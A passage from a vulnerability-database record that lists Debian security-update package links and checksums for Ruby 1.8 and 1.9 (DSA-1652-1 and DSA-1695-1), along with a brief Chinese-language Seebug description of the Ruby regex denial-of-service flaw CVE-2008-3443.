http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 1667940 7a061e90f07190e08cb1d7dd87ceba0b\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 299388 46bc91d4748b41dc94e047bab5dedd51\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 216268 d71b6f0a4b75fb7e1251e69d746ca7c6\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 858514 9670a0b7dae56385110e24a689a2bba8\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 235568 f81cd64d18fd7d9ad05be290eaa3a2f7\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 218494 e3554e99b745b152c5adceb8b792598b\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 218182 5d950d3fe9d4144a4a113febc734a657\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 312442 ba212e89d3ed795826291b8b83b755bf\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 1808838 f27c1864da2a5f200eba5f856ab9ec4d\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 217620 c293eeeff7ea8f7b2662543f1787e382\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 237222 ba705f2b59847458ae944c9d88cfa29e\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 777068 75b95c3a7627b97ed7cb6b65b2d430d4\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 372912 2082b7a24c82d5c444d9a8e9971d153c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 1844652 17411d10899861a4e0db3f2b58aa2f04\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 327718 deaec089c668e98c3826f9c3f9c16906\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 217444 091b5e0da9d7f8cab82fbaac51555800\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 1849530 a4eb5998265e1c0d10e47d9b3fd3376a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 371458 38d13d9c042fa13cb83e056dd6f75876\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 1855840 f311eafe38b79f66c8ed62d750516e3c\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 235460 c8e69420f67a74626d536b1e0634a5ee\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 884264 cb34a6a0e54e9699c2cc2527721e334a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 217506 f0ee0fdfef50c2442f8ef375e1830575\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 217974 62409b7918e14178a04f381f14b0b009\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 822856 9506219f2b044210b34532e0900c843d\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 216666 1fdc236fbbcc05ec4dcb69f287e26d4a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 372806 a217f49c1f19fa3c8fdcebc6120b89e7\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 1843374 5f6e40930829a86a4694231a1312e5b9\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 216752 7e5681d7aa0e675b3fe26e83f146ac94\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 1793464 023e643cbaca8191e5c213e228a59150\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 317666 4e0e420084673e075456a2cc78102cf2\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 215972 20c5e03b7c7cad010b849fdcd77f9dbf\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 235354 2ce73be64e9f94b1beff935e7ffcba2f\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2008-10-12T09:38:22", "published": "2008-10-12T09:38:22", "id": "DEBIAN:DSA-1652-1:B2D5C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00244.html", "title": "[SECURITY] [DSA 1652-1] New ruby1.9 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "seebug": [{"lastseen": "2017-11-19T21:19:34", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 30682\r\nCVE(CAN) ID: CVE-2008-3443\r\n\r\nRuby\u662f\u4e00\u79cd\u529f\u80fd\u5f3a\u5927\u7684\u9762\u5411\u5bf9\u8c61\u7684\u811a\u672c\u8bed\u8a00\u3002\r\n\r\nRuby\u7684\u6b63\u5219\u8868\u8fbe\u5f0f\u5f15\u64ce\uff08regex.c\uff09\u6ca1\u6709\u6b63\u786e\u5730\u4e3a\u5957\u63a5\u5b57\u5206\u914d\u5185\u5b58\uff0c\u5982\u679c\u8fdc\u7a0b\u653b\u51fb\u8005\u5411ruby\u5957\u63a5\u5b57\u53d1\u9001\u4e86\u591a\u4e2a\u8d85\u957f\u8bf7\u6c42\u7684\u8bdd\uff0c\u5c31\u4f1a\u5bfc\u81f4ruby\u9677\u5165\u6b7b\u5faa\u73af\u5e76\u5d29\u6e83\u3002\r\n\n\nYukihiro Matsumoto Ruby 1.9.x\r\nYukihiro Matsumoto Ruby 1.8.x\n \u5382\u5546\u8865\u4e01\uff1a\r\n\r\nDebian\r\n------\r\nDebian\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08DSA-1695-1\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nDSA-1695-1\uff1aNew Ruby packages fix denial of service\r\n\u94fe\u63a5\uff1a<a href=http://www.debian.org/security/2009/dsa-1695 target=_blank rel=external nofollow>http://www.debian.org/security/2009/dsa-1695</a>\r\n\r\n\u8865\u4e01\u4e0b\u8f7d\uff1a\r\n\r\nSource archives:\r\n\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5.orig.tar.gz target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5.orig.tar.gz</a>\r\nSize/MD5 checksum: 4434227 aae9676332fcdd52f66c3d99b289878f\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4.dsc target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4.dsc</a>\r\nSize/MD5 checksum: 1102 1c38e939e74513153ee6677ef9f85b0d\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4.diff.gz target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4.diff.gz</a>\r\nSize/MD5 checksum: 176939 2fea21ebd5e29d26714843fa415d6310\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4.diff.gz target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4.diff.gz</a>\r\nSize/MD5 checksum: 32843 859c9ba559722e156d6931f3c8c347a4\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609.orig.tar.gz target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609.orig.tar.gz</a>\r\nSize/MD5 checksum: 4450198 483d9b46a973c7e14f7586f0b1129891\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4.dsc target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4.dsc</a>\r\nSize/MD5 checksum: 1379 cbcf9f41397f2658e1db5ebae0178ccd\r\n\r\nArchitecture independent packages:\r\n\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-examples_1.9.0+20060609-1etch4_all.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-examples_1.9.0+20060609-1etch4_all.deb</a>\r\nSize/MD5 checksum: 265870 fc302abc0465ab56ccd16fc0e724885c\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/irb1.9_1.9.0+20060609-1etch4_all.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/irb1.9_1.9.0+20060609-1etch4_all.deb</a>\r\nSize/MD5 checksum: 255764 40a840e93b23abfe83f06fb68e411ecc\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/rdoc1.8_1.8.5-4etch4_all.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/rdoc1.8_1.8.5-4etch4_all.deb</a>\r\nSize/MD5 checksum: 309788 1a32b37a2ae266825239d31479481202\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ri1.8_1.8.5-4etch4_all.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ri1.8_1.8.5-4etch4_all.deb</a>\r\nSize/MD5 checksum: 1232694 0f2de56be8bf69925bdd69c0ebdb6e88\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-elisp_1.9.0+20060609-1etch4_all.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-elisp_1.9.0+20060609-1etch4_all.deb</a>\r\nSize/MD5 checksum: 229450 c445df6488d98bba432cad422b2d26d2\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ri1.9_1.9.0+20060609-1etch4_all.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ri1.9_1.9.0+20060609-1etch4_all.deb</a>\r\nSize/MD5 checksum: 694310 ba20a22e37fe3128ba68065e81b34be2\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/rdoc1.9_1.9.0+20060609-1etch4_all.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/rdoc1.9_1.9.0+20060609-1etch4_all.deb</a>\r\nSize/MD5 checksum: 318608 107093187b68a01e89937e5595ada72f\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/irb1.8_1.8.5-4etch4_all.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/irb1.8_1.8.5-4etch4_all.deb</a>\r\nSize/MD5 checksum: 235540 742511548e73ce861aec2ebced3bb820\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-elisp_1.8.5-4etch4_all.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-elisp_1.8.5-4etch4_all.deb</a>\r\nSize/MD5 checksum: 210174 3f151d4c5e251849b7bc82a4c0cc6717\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-examples_1.8.5-4etch4_all.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-examples_1.8.5-4etch4_all.deb</a>\r\nSize/MD5 checksum: 243302 af6b1eacf4c03bc3fe53e3c2a8e13044\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_alpha.deb</a>\r\nSize/MD5 checksum: 199212 7450977513c7006dd667426d5499092c\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_alpha.deb</a>\r\nSize/MD5 checksum: 324692 f53f9acfd76ea3a29a8ef4892f2b573a\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_alpha.deb</a>\r\nSize/MD5 checksum: 237774 e9a60d0d7c8f73357b09bb6188070e21\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_alpha.deb</a>\r\nSize/MD5 checksum: 217606 1479ee1a4b51cb0a75783b2f3844723b\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_alpha.deb</a>\r\nSize/MD5 checksum: 219472 952a4e672625ce7f2529493b00364604\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_alpha.deb</a>\r\nSize/MD5 checksum: 301142 fb710ce9d21ff1fb7f8a3808fcb78d60\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_alpha.deb</a>\r\nSize/MD5 checksum: 216946 515718544ab0101093c6a57e63cb1cb8\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_alpha.deb</a>\r\nSize/MD5 checksum: 903520 d39e018101c51c880e2cd9895a88a1f8\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_alpha.deb</a>\r\nSize/MD5 checksum: 961022 f6d226e51af5740c5bda5772cf20e8a8\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_alpha.deb</a>\r\nSize/MD5 checksum: 217630 292a9b82a47bd1bc3c7b4ab440029cca\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_alpha.deb</a>\r\nSize/MD5 checksum: 198300 653c076799344535ac9b6a791ffb132d\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_alpha.deb</a>\r\nSize/MD5 checksum: 1881422 2eb8f5dd96ced6eac7473eed467c5663\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_alpha.deb</a>\r\nSize/MD5 checksum: 1869092 3d45f58f803de6208f28d5267be89ecf\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_alpha.deb</a>\r\nSize/MD5 checksum: 199236 81f0b4078e9412536836f8b973756318\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_alpha.deb</a>\r\nSize/MD5 checksum: 1074308 f3ec5b9b0349dbc5ef735942a997327c\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_alpha.deb</a>\r\nSize/MD5 checksum: 1890052 5779555b10f64a438773cbf048ac545c\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_alpha.deb</a>\r\nSize/MD5 checksum: 340202 69dd9f78aca79c5e05b191d7163a01b4\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_alpha.deb</a>\r\nSize/MD5 checksum: 1638634 ed825a333226565b4b98b32b93cd1fe6\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_amd64.deb</a>\r\nSize/MD5 checksum: 807592 464c13292ce358b22247cc998f743562\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_amd64.deb</a>\r\nSize/MD5 checksum: 216630 867bdeff043830d6bad157d1931dc948\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_amd64.deb</a>\r\nSize/MD5 checksum: 235632 c4ad4cb0bb9cd697534a2c262100c6cc\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_amd64.deb</a>\r\nSize/MD5 checksum: 198112 17cd7156a45a5aff5c27d82e268a3c4d\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_amd64.deb</a>\r\nSize/MD5 checksum: 1070604 1bddf59e7b60371ff8099b08bf75ac30\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_amd64.deb</a>\r\nSize/MD5 checksum: 1850656 aa571b58631a8557f7019d592636f481\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_amd64.deb</a>\r\nSize/MD5 checksum: 749162 af403f99a95355682a54909929e5199a\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_amd64.deb</a>\r\nSize/MD5 checksum: 216080 a43f4b0559aa2c9b50ea5d7973162aa2\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_amd64.deb</a>\r\nSize/MD5 checksum: 197652 a9e00dc85e9f2cae38eb09e899130248\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_amd64.deb</a>\r\nSize/MD5 checksum: 217322 9e02a9f097c955e4400812f0c04d7508\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_amd64.deb</a>\r\nSize/MD5 checksum: 1830274 53805790080b4cd1daf1a4d63ed8256c\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_amd64.deb</a>\r\nSize/MD5 checksum: 1878288 01c7b13369a8758303404727fea129fd\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_amd64.deb</a>\r\nSize/MD5 checksum: 301112 987113850c63d29874841e5faff83d89\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_amd64.deb</a>\r\nSize/MD5 checksum: 198726 4d65ce2e10feab441a946a18023daf42\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_amd64.deb</a>\r\nSize/MD5 checksum: 216568 93fe5252d04959e64dc6576d95b7c2b6\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_amd64.deb</a>\r\nSize/MD5 checksum: 1584216 69ed7f6bca37c0c549bf528f773e2900\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_amd64.deb</a>\r\nSize/MD5 checksum: 323450 5baea37cc897959fc20d48ac89de0d74\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_amd64.deb</a>\r\nSize/MD5 checksum: 345864 c39d9b07d0cb6e4099ca3efeafb5fa6e\r\n\r\narm architecture (ARM)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_arm.deb</a>\r\nSize/MD5 checksum: 1526984 0e6ab8221858243c7145bbc41ecb4e8f\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_arm.deb</a>\r\nSize/MD5 checksum: 365056 66c7f98e2bb319a62ee7c4c92672c731\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_arm.deb</a>\r\nSize/MD5 checksum: 196710 9e8c6e4cb718dc719e8fde6b26f962e4\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_arm.deb</a>\r\nSize/MD5 checksum: 991516 14a9b5cbf719d62dc8353a51afb555a9\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_arm.deb</a>\r\nSize/MD5 checksum: 1859122 e0c7c1e7d2ccf0e49bce45e7e7bf1278\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_arm.deb</a>\r\nSize/MD5 checksum: 1792772 d56d498189d5406b5020d9d924117e7c\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_arm.deb</a>\r\nSize/MD5 checksum: 197418 d26ec8fb413c9ebab080bedea93722b1\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_arm.deb</a>\r\nSize/MD5 checksum: 197808 a36c730da4bcea2d72f5d370322eb30f\r\n<a 